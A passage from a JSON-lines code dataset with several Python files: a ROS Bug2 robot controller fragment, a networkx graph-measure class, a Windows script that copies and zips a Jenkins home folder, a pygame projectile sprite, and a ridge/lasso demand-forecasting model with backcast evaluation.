CheckObstaclesInTheWay():\n print('front clear')\n linear_vel = 0.8\n \"\"\" if(CheckObstaclesInTheLeft()):\n line = wall_line\n angular_vel = ComputeAng_VelForWF(line, robot_angle) \"\"\"\n if not CheckObstaclesInTheFront():\n robot_state = 'GOALSEEK'\n \n\n print('Final State %s' % robot_state)\n print('Linear vel %s' % linear_vel)\n print('angular vel %s' % angular_vel)\n setVelocity(linear_vel, angular_vel)\n print('===============================================')\n rospy.sleep(1.0)\n \n\nif __name__ == '__main__':\n rospy.init_node('bug2_controller')\n vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=5)\n publisher = rospy.Publisher(\"visualization_marker\", Marker, queue_size=10)\n rospy.Subscriber(\"base_scan\", LaserScan, ExtractPointsFromBaseScan)\n rospy.Subscriber('base_pose_ground_truth', Odometry, CallbackBPGT)\n bug2_implementation()\n print(\"done\") \n rospy.spin() \n", "sub_path": "lab2/src/bug2.py", "file_name": "bug2.py", "file_ext": "py", "file_size_in_byte": 8586, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.empty", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 36, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 57, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Point", "line_number": 61, "usage_type": "call"}, {"api_name": "geometry_msgs.msg", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 92, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 109, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 110, "usage_type": "call"}, {"api_name": "rospy.Time.now", "line_number": 113, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 113, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker.ADD", "line_number": 116, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 116, "usage_type": "name"}, {"api_name": "visualization_msgs.msg.Marker.LINE_LIST", "line_number": 117, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 117, "usage_type": "name"}, {"api_name": "rospy.Duration", "line_number": 125, "usage_type": "call"}, {"api_name": "tf.transformations.euler_from_quaternion", "line_number": 139, "usage_type": "call"}, {"api_name": "tf.transformations", "line_number": 139, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 177, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 180, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 183, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 198, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 204, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 206, "usage_type": "call"}, {"api_name": "rospy.sleep", "line_number": 263, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 267, "usage_type": "call"}, {"api_name": "rospy.Publisher", "line_number": 268, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 268, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 269, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 269, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 270, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.LaserScan", "line_number": 270, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 271, "usage_type": "call"}, {"api_name": "nav_msgs.msg.Odometry", "line_number": 271, "usage_type": "argument"}, {"api_name": "rospy.spin", "line_number": 274, "usage_type": "call"}]} +{"seq_id": "449166886", "text": "from fragility.analyzers.graphanalysis.base import BaseGraphModel\n\nimport networkx as nx \nimport numpy as np \n\n'''\nGraphanalysis.py\n@By: Adam Li\n@Date: 4/20/18\n\n@Description: Basic class wrapper for using networkx package to implement\npython graph analysis of an adjacency matrix and output graph theoretic measures\nin a list.\n\nPass in a full time series of adjacency matrices, and then call the 'run()' function\nto compute a list of graph theoretic measures for each node in the matrix.\n\nOptional to threshold the adjaceny matrices beforehand with a pre-set threshold.\n\n'''\n\nclass TimeVaryingGraph(BaseGraphModel):\n # initialize list of graph theoretic measures\n indegrees = []\n outdegrees = []\n betweencents = []\n eigcents = []\n\n graph_measures_time = []\n\n def __init__(self, config=None):\n super(TimeVaryingGraph, self).__init__(config=config)\n\n def run(self, adjmats, thresh=None):\n # make sure the adjacency matrix is all positive\n adjmats = np.abs(adjmats)\n assert adjmats.ndim == 3\n assert adjmats.shape[1] == adjmat.shape[2] \n \n # apply threshold\n if thresh is not None:\n assert thresh > 0.0 and thresh < 1.0\n adjmats = self._thresh(adjmats, thresh)\n\n for iwin in range(adjmat.shape[0]):\n adjmat = adjmats[iwin,...].squeeze()\n\n # compute graph measures on this one matrix\n G = nx.from_numpy_array(adjmat,\n create_using=nx.DiGraph())\n self._compute_indegree(G)\n self._compute_outdegree(G)\n self._compute_betweencent(G)\n self._compute_eigcent(G)\n\n def fcd_speed(self, adjmats, thresh=None):\n \"\"\"\n Function to implement the functional connectivity dynamics\n of the matrices over time. \n\n This is to characterize the speed, acceleration and group statistics.\n \"\"\"\n pass\n\n\n\n\n\n", "sub_path": "fragility/analyzers/graphanalysis/timevarying.py", "file_name": "timevarying.py", "file_ext": "py", "file_size_in_byte": 1950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fragility.analyzers.graphanalysis.base.BaseGraphModel", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 36, "usage_type": "call"}, {"api_name": "networkx.from_numpy_array", "line_number": 49, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "1882086", "text": "'''\narchive Jenkins home on windows\n\n'''\n\nimport configparser\nimport os\nimport datetime\nfrom zip import Zip\nimport time\nimport zipfile\n\n#date and time\n\nnow = datetime.datetime.now()\ncurrent_date_time = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#load config\n\nconfig = configparser.ConfigParser()\nconfig.read('global.cfg')\njenkins_backup_retention = config['ARCHIVE']['jenkins_backup_retention']\njenkins_backup_location = config['ARCHIVE']['jenkins_backup_location']\n\n#stage files for archive\n\nnow_file_stamp = now.strftime(\"%Y-%m-%d_%H%M%S\")\njenkins_backup_file_name = 'jenkins_full_backup_'+now_file_stamp\nzip_file_name = 'jenkins_full_backup_'+now_file_stamp+'.zip'\nos.system('mkdir E:\\\\backups\\\\jenkins_full_backups\\\\'+ jenkins_backup_file_name )\ntime.sleep(5)\nos.system('ROBOCOPY E:\\\\Jenkins\\\\ E:\\\\backups\\\\jenkins_full_backups\\\\'+ jenkins_backup_file_name +' /E')\n\n#create the compressed archive\n\nzipf = zipfile.ZipFile('E:\\\\backups\\\\jenkins_full_backups\\\\'+zip_file_name, 'w', zipfile.ZIP_DEFLATED)\nzf = Zip()\nzf.ZipDir('E:\\\\backups\\\\jenkins_full_backups\\\\',zipf)\nzipf.close()\n\nos.system('rmdir E:\\\\backups\\\\jenkins_full_backups\\\\'+ jenkins_backup_file_name+' /s /q')\n\n\n\n\n\n", "sub_path": "archive.py", "file_name": "archive.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 20, "usage_type": "call"}, {"api_name": "os.system", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "os.system", "line_number": 32, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 36, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 36, "usage_type": "attribute"}, {"api_name": "zip.Zip", "line_number": 37, "usage_type": "call"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "95413059", "text": "#!/user/bin/python3\n# -*- coding = utf-8 -*-\n# @Time : 2021/2/7\n# @Author : 郑煜辉\n# @File : Peashooter\n\nimport pygame\n\n\nclass Buttet(pygame.sprite.Sprite):\n def __init__(self,plant):\n super(Buttet,self).__init__()\n self.images = pygame.image.load('images/bullets/peaBullet.png').convert_alpha()\n self.rect = self.images.get_rect()\n self.rect.left = plant.zone[0]+35\n self.rect.top = plant.zone[1]\n self.speed = 15\n self.status = True\n self.attact = 1\n\n def move(self):\n if self.rect.left<1200:\n self.rect.left+=self.speed\n else:\n self.status = False\n\n\n\n\n def hit(self,enemyList):\n for enemy in enemyList:\n if pygame.sprite.collide_circle_ratio(0.5)(enemy,self):\n enemy.blood-=self.attact\n if enemy.blood == 0:\n enemy.is_live = False\n self.status = False\n", "sub_path": "bullet.py", "file_name": "bullet.py", "file_ext": "py", "file_size_in_byte": 941, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.sprite", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_circle_ratio", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "170636816", "text": "import numpy as np\nimport pandas as pd\nimport scipy \n# import boruta\n# from boruta import BorutaPy\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble import BaggingRegressor\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.ensemble import BaggingRegressor\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import StandardScaler, RobustScaler, MinMaxScaler\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.utils.fixes import loguniform\n\n\nclass CCARD_MODEL(): \n \n \"\"\"\n This class implements CCARD level model with feature selection\n \n Parameters\n ----------\n feature_selection : bool\n Perform feature selection or not\n hyperparameter_tuning : bool\n Tune the model or not\n model_name : str\n Name of the model (default is ridge)\n Support 'ridge', 'SVR' in backcast function\n transformation: str\n 'log' or 'sqrt' transformation of y\n random_state: int\n set seed for the model \n \n \"\"\"\n \n # some class variables\n LASSO_FEATURE_SELECTION_PENALTY = 0.005 # gives good number of features ~ 50 \n RIDGE_PENALTY = 0.001 # default choice with little penalization\n SVR_C, SVR_epislon = 10.0, 0.2 # from Vicky's model \n EPSILON_LOG_ACTUAL = 0.001\n \n \n def __init__(self, feature_selection = False, hyperparameter_tuning = True, training_to = None, model_name = 'ridge', transformation = 'log', random_state=0): \n \n self.random_state = random_state\n self.training_to = training_to\n self.feature_selection = feature_selection\n self.model_name = model_name\n self.transformation = transformation\n self.selected_cols = None\n self.hyperparameter_tuning = hyperparameter_tuning\n\n\n # some helper functions \n @staticmethod \n def remove_collinearity(df, r_thresh = 0.99): \n \"\"\"\n identify collinear features\n \"\"\"\n corr_matrix = df.corr().abs()\n upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool))\n to_drop = [column for column in upper.columns if any(upper[column] > r_thresh)]\n return to_drop\n\n \n @staticmethod\n def _remove_extra_vars(X): \n \"\"\"\n remove features before training\n \"\"\"\n removed_vars = ['log_actual', 'date', 'log_alp', 'sqrt_actual', 'asin','Customer-Facing Name', 'log_baseline', 'holiday', 'program', 'country', 'actual', 'device_type', 'qty', 'asin_start_date', 'dtcp']\n for var in removed_vars:\n if var in X.columns: \n X = X.drop(var, axis = 1)\n \n return X\n \n @staticmethod\n def compute_mape_bias(y_true, y_pred, clip = True):\n \"\"\"\n compute MAPE and bias \n \"\"\"\n bias = (np.sum(y_pred) - np.sum(y_true))/np.sum(y_true)\n pe = np.abs(bias)\n rmse = np.sqrt(np.mean(pow(y_pred-y_true,2)))\n\n if clip: \n bias = np.clip(bias,-1,1)\n pe = min(pe,1)\n\n return pe, bias, rmse\n \n\n def _perform_stability_selection(self, alphas, X, y, n_bootstrap_iterations = 100, seed = 0):\n \"\"\"\n perform bootstrapped feature selection (pre-alpha mode)\n \"\"\"\n \n n_samples, n_variables = X.shape\n n_alphas = alphas.shape[0]\n rnd = np.random.RandomState(seed)\n selected_variables = np.zeros((n_variables,n_bootstrap_iterations))\n stability_scores = np.zeros((n_variables, n_alphas))\n\n for idx, alpha, in enumerate(alphas):\n for iteration in range(n_bootstrap_iterations):\n bootstrap = rnd.choice(np.arange(n_samples),\n size= int(n_samples*0.8),\n replace=False)\n\n X_train = X.iloc[bootstrap,:]\n y_train = y.iloc[bootstrap]\n\n params = {'alpha': alpha}\n lasso = Lasso(**params)\n lasso.fit(X_train, y_train)\n selected_variables[:, iteration] = (np.abs(lasso.coef_) > 1e-4)\n\n stability_scores[:, idx] = selected_variables.mean(axis=1)\n\n self.selected_cols = X_train.columns[stability_scores[:,0] > .25].values\n\n \n def _perform_feature_selection(self, X, y, algo = 'lasso'):\n \"\"\"\n perform feature selection using 'lasso' or 'boruta' (boruta is not supported by Eider yet)\n \"\"\"\n \n if self.selected_cols is None: \n X = self._remove_extra_vars(X) # remove extra vars from X\n \n if algo == 'boruta':\n rf_boruta = RandomForestRegressor(n_jobs=40, random_state=self.random_state)\n boruta = BorutaPy(rf_boruta, n_estimators=100, verbose=2, alpha = 0.05)\n boruta.fit(X.values, y.values.ravel())\n self.selected_cols = X.columns[boruta.support_]\n elif algo == 'lasso': \n lr = Lasso(alpha = self.LASSO_FEATURE_SELECTION_PENALTY).fit(X, y)\n model = SelectFromModel(lr, prefit=True)\n self.selected_cols = np.unique(np.concatenate([X.columns[model.get_support()].values, ['covid', 'asp']]))\n# print(self.selected_cols)\n else: \n print('currently supporting only Boruta or Lasso')\n\n \n def perform_hyperparameter_tuning(self, X,y, model_name = 'ridge', n_values = 100):\n if model_name == 'ridge':\n# model = Ridge()\n# reg_pipeline = Pipeline([('scaler', MinMaxScaler()), \n# ('Ridge', Ridge())])\n\n# param_grid = [{'alpha': np.logspace(-5,5,100)}]\n param_dist = {'alpha': loguniform(1e-5, 1e0)}\n clf = RandomizedSearchCV(estimator = Ridge(normalize = True), param_distributions = param_dist, n_iter = 50, n_jobs = 10, random_state = self.random_state)\n clf.fit(X, y)\n return clf.best_params_ \n \n else: \n print(\"Only supporting Ridge for now\")\n \n def fit(self, X,y):\n \n # length checks\n assert(X.shape[0] == len(y))\n X = self._remove_extra_vars(X)\n X.replace([np.inf, -np.inf], np.nan,inplace=True)\n X.fillna(X.mean(), inplace = True) # fill nan's values \n\n\n if self.feature_selection and (self.selected_cols is None):\n print('running feature selection ...')\n self._perform_feature_selection(X,y)\n \n X = X[self.selected_cols]\n \n \n if self.model_name == 'ridge':\n \n best_params = {'alpha':self.RIDGE_PENALTY} # default hyperparameters\n if self.hyperparameter_tuning: \n print(\"Running hyperparameter tuning ...\")\n best_params = self.perform_hyperparameter_tuning(X, y, self.model_name)\n\n # print('The best param(s) are {}'.format(best_params))\n self.model = Ridge(**best_params)\n\n self.model.fit(X, y)\n \n def predict(self, X): \n \n X = self._remove_extra_vars(X)\n X.replace([np.inf, -np.inf], np.nan,inplace=True)\n X.fillna(X.mean(), inplace = True) # fill nan's values \n y_pred = self.model.predict(X)\n vlt_vars = X.columns[['vlt' in x for x in X.columns]]\n \n for vlt_var in vlt_vars: # set VLT vars to 0\n X[vlt_var] = 0.0 \n\n y_pred = self.model.predict(X)\n if self.transformation == 'log':\n y_pred = np.exp(y_pred)\n if self.transformation == 'sqrt': \n y_pred = pow(y_pred,2)\n \n return y_pred \n \n\n # perform backcast on certain periods\n def back_cast(self, df, backcast_periods, END_DATE, horizon, metric_clip = True, retrain = True): \n \"\"\"\n Parameters\n ----------\n retrain : bool\n Redo feature selection for each new forecast version \n \n \"\"\"\n \n df.replace([np.inf, -np.inf], np.nan,inplace=True)\n\n \n result_vec = []\n for i, training_to in enumerate(backcast_periods): \n print('Fold {}'.format(i+1))\n df_result = self.evaluate_model(df, training_to, END_DATE, horizon, metric_clip, model_name = self.model_name, retrain = retrain)\n if df_result is not None:\n result_vec.append(df_result)\n \n df_result_all = pd.concat(result_vec)\n# print(df_result_all)\n \n # save program-level result\n self.program_result = df_result_all\n \n # get program level MAPEs and Biases\n weight_vec, wmape_vec, wbias_vec = [], [], []\n programs = df_result_all.program.unique()\n program_vec = []\n for program in programs:\n temp = df_result_all[df_result_all.program == program]\n wmape = np.sum(temp['ape']*temp['weight'])/np.sum(temp['weight'])\n wbias = np.sum(temp['bias']*temp['weight'])/np.sum(temp['weight'])\n weight = np.sum(temp['weight'])\n wmape_vec.append(wmape)\n wbias_vec.append(wbias)\n program_vec.append(program)\n weight_vec.append(weight)\n\n df_horizon = pd.DataFrame({'program': program_vec, 'wmape': wmape_vec, 'wbias': wbias_vec, 'weight':weight_vec})\n df_horizon['horizon'] = horizon\n df_horizon = df_horizon.sort_values(by = ['program'])\n \n # get topline level MAPE and BIAS\n w_vec, b_vec, wei_vec = [], [], []\n for training_to in df_result_all.training_to.unique():\n weight_vec, wmape_vec, wbias_vec = [], [], []\n programs = df_result_all.program.unique()\n program_vec = []\n df_temp = df_result_all[df_result_all.training_to == training_to]\n for program in df_temp.program.unique():\n temp = df_temp[df_temp.program == program]\n wmape = np.sum(temp['ape']*temp['weight'])/np.sum(temp['weight'])\n wbias = np.sum(temp['bias']*temp['weight'])/np.sum(temp['weight'])\n weight = np.sum(temp['weight'])\n wmape_vec.append(wmape)\n wbias_vec.append(wbias)\n program_vec.append(program)\n weight_vec.append(weight)\n\n wmape_vec = np.array(wmape_vec)\n wbias_vec = np.array(wbias_vec)\n program_vec = np.array(program_vec)\n wmape = np.nansum(wmape_vec*weight_vec)/np.nansum(weight_vec)\n wbias = np.nansum(wbias_vec*weight_vec)/np.nansum(weight_vec)\n weight = np.nansum(weight_vec)\n\n w_vec.append(wmape)\n b_vec.append(wbias)\n wei_vec.append(weight)\n \n w_vec, b_vec, wei_vec = np.array(w_vec), np.array(b_vec), np.array(wei_vec)\n \n # topline mape bias\n wmape_aucc, wbias_aucc = np.sum(w_vec*wei_vec)/np.sum(wei_vec), np.sum(b_vec*wei_vec)/np.sum(wei_vec)\n\n df_horizon = df_horizon.append({'program': 'AuCC', 'wmape':wmape_aucc, 'wbias': wbias_aucc, 'horizon':horizon}, ignore_index = True)\n \n return df_horizon, df_result_all\n \n \n def evaluate_model(self, df, training_to, END_DATE, horizon, metric_clip, model_name = 'LR', save_forecasts = False, retrain = True): \n \n print('Preparing training and test sets ...')\n \n df_program = df[['date', 'program']]\n \n if (training_to + pd.Timedelta(days = horizon*7-1)) < pd.to_datetime(END_DATE): \n\n\n forecast_to = training_to + pd.Timedelta(days = horizon*7)\n forecast_to = forecast_to.strftime('%Y-%m-%d')\n training_to = training_to.strftime('%Y-%m-%d')\n print('Training model up to {} and forecasting up to {}'.format(training_to, forecast_to))\n\n \n if model_name == 'SVR': # create trends for SVR \n df['trend_6m'] = (pd.to_datetime(df['date'])-(pd.to_datetime(training_to) - pd.Timedelta(30*6))).dt.days\n df['trend_6m'] = np.where(df['trend_6m']<=0,0,np.log(df['trend_6m']))\n df['trend_12m'] = (pd.to_datetime(df['date'])-(pd.to_datetime(training_to) - pd.Timedelta(30*12))).dt.days\n df['trend_12m'] = np.where(df['trend_12m']<=0,0,np.log(df['trend_12m']))\n \n\n # create train/test sets\n train = df[df.date < training_to]\n test = df[(df.date >= training_to) & (df.date < forecast_to)]\n if self.transformation == 'log':\n y_train, X_train = np.log(train['actual'] + self.EPSILON_LOG_ACTUAL), self._remove_extra_vars(train)\n y_test, X_test = np.log(test['actual'] + self.EPSILON_LOG_ACTUAL), self._remove_extra_vars(test)\n \n if self.transformation == 'sqrt':\n y_train, X_train = np.sqrt(train['actual']), self._remove_extra_vars(train)\n y_test, X_test = np.sqrt(test['actual']), self._remove_extra_vars(test)\n \n X_train.fillna(X_train.mean(), inplace = True) # fill nan's values \n X_test.fillna(X_test.mean(), inplace = True) # fill nan's values\n \n # reset feature set for each forecast version\n if retrain: \n self.selected_cols = None\n\n \n # feature selection\n if self.selected_cols is None: \n print('Running feature selection ...')\n self._perform_feature_selection(X_train, y_train)\n\n \n X_train = X_train[self.selected_cols]\n X_test = X_test[self.selected_cols]\n \n \n# to_drop = self.remove_collinearity(X_train, r_thresh = 0.80)\n# print('collinear features: {}'.format(to_drop))\n# X_train = X_train.drop(to_drop, axis = 1)\n# X_test = X_test.drop(to_drop, axis = 1)\n \n n_unique = X_train.apply(lambda x: len(np.unique(x))) \n selected_vars = X_train.columns[~((n_unique > 2) & (n_unique < 40))]\n var_list = X_train[selected_vars].columns[X_train[selected_vars].apply(lambda x: np.std(x)) == 0]\n print('Dropping constant vars: {}'.format(var_list.values))\n X_train = X_train.drop(var_list, axis = 1)# test correlations\n X_test = X_test.drop(var_list, axis = 1)\n train = train.drop(var_list, axis = 1)\n\n train_program = df_program[df_program.date < training_to]\n test_program = df_program[(df_program.date >= training_to) & (df_program.date < forecast_to)]\n \n\n # train model and generate forecasts\n if model_name == 'SVR': # based on Vicky's code\n sc_y = StandardScaler()\n y_pre = train[['sqrt_actual']]\n y = sc_y.fit_transform(y_pre)\n X_pre = X_train\n pipeline = Pipeline([('scaler', StandardScaler()),('estimator', SVR(C=self.SVR_C, epsilon=self.SVR_epsilon, gamma='auto', kernel='poly',degree = 3))])\n pipeline.fit(X_pre, y)\n X_test['instock_pct'] = 1.0 \n y_pred = sc_y.inverse_transform(pipeline.predict(X_test))\n\n if model_name == 'LR':\n \n model = LinearRegression()\n print(X_train.columns.values)\n model.fit(X_train,y_train)\n print('max coef. {}'.format(np.max(np.abs(model.coef_)))) # check coefs\n vlt_vars = X_test.columns[['vlt' in x for x in X_test.columns]]\n for vlt_var in vlt_vars: # set VLT vars to 0\n X_test['vlt'] = 0.0 # unconstrained forecast\n \n y_pred = model.predict(X_test)\n \n if model_name == 'ridge':\n \n best_params = {'alpha':self.RIDGE_PENALTY} # default hyperparameters\n if self.hyperparameter_tuning: \n print(\"Running hyperparameter tuning ...\")\n best_params = self.perform_hyperparameter_tuning(X_train, y_train, self.model_name)\n \n print('The best param(s) are {}'.format(best_params))\n model = Ridge(**best_params, normalize = True)\n model.fit(X_train,y_train)\n \n vlt_vars = X_test.columns[['vlt' in x for x in X_test.columns]]\n for vlt_var in vlt_vars: # set VLT vars to 0\n X_test[vlt_var] = 0.0 \n y_pred = model.predict(X_test)\n \n if model_name == 'KRR': # need to reoptimize later\n params = {'alpha': 0.0001,'gamma': 0.0022,'kernel': 'laplacian'}\n model = KernelRidge(**params)\n reg_pipeline = make_pipeline(preprocessing.StandardScaler(), model)\n reg_pipeline.fit(X_train,y_train)\n X_test['vlt'] = 0.0 # unconstrained forecast\n y_pred = reg_pipeline.predict(X_test)\n\n\n if save_forecasts: \n test['y_pred'] = y_pred\n self.forecasts = test\n\n # evaluate performance at program-level\n ape_vec = []\n weight_vec = []\n bias_vec = []\n training_to_vec = []\n program_vec = []\n for program in train_program.program.unique():\n mask = (test_program.program == program).values\n if np.sum(mask) > 0:\n y_pred_program = y_pred[mask]\n y_test_program = y_test[mask]\n \n # check lengths\n assert len(y_pred_program) == len(y_test_program)\n \n # untransform y\n if self.transformation == 'log': \n y_test_program = np.exp(y_test_program) - self.EPSILON_LOG_ACTUAL\n y_pred_program = np.exp(y_pred_program) - self.EPSILON_LOG_ACTUAL\n elif self.transformation == 'sqrt':\n y_test_program = pow(y_test_program,2)\n y_pred_program = pow(y_pred_program,2)\n\n ape, bias, rmse = self.compute_mape_bias(y_test_program, y_pred_program, metric_clip)\n weight_vec.append(np.sum(y_test_program))\n ape_vec.append(ape)\n bias_vec.append(bias)\n program_vec.append(program)\n\n df_result = pd.DataFrame({'program':program_vec, 'ape':ape_vec, 'weight':weight_vec, 'bias':bias_vec})\n df_result['training_to'] = training_to\n \n# print(df_result)\n return df_result\n else:\n print('Less than {} weeks to forecast'.format(horizon))\n return None\n \n \n\n ", "sub_path": "utils/LR_prod.py", "file_name": "LR_prod.py", "file_ext": "py", "file_size_in_byte": 19151, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.triu", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 122, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 145, "usage_type": "call"}, {"api_name": "sklearn.utils.fixes.loguniform", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 159, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 224, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 302, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 302, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 305, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 312, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 314, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 354, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 366, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 370, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 370, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", 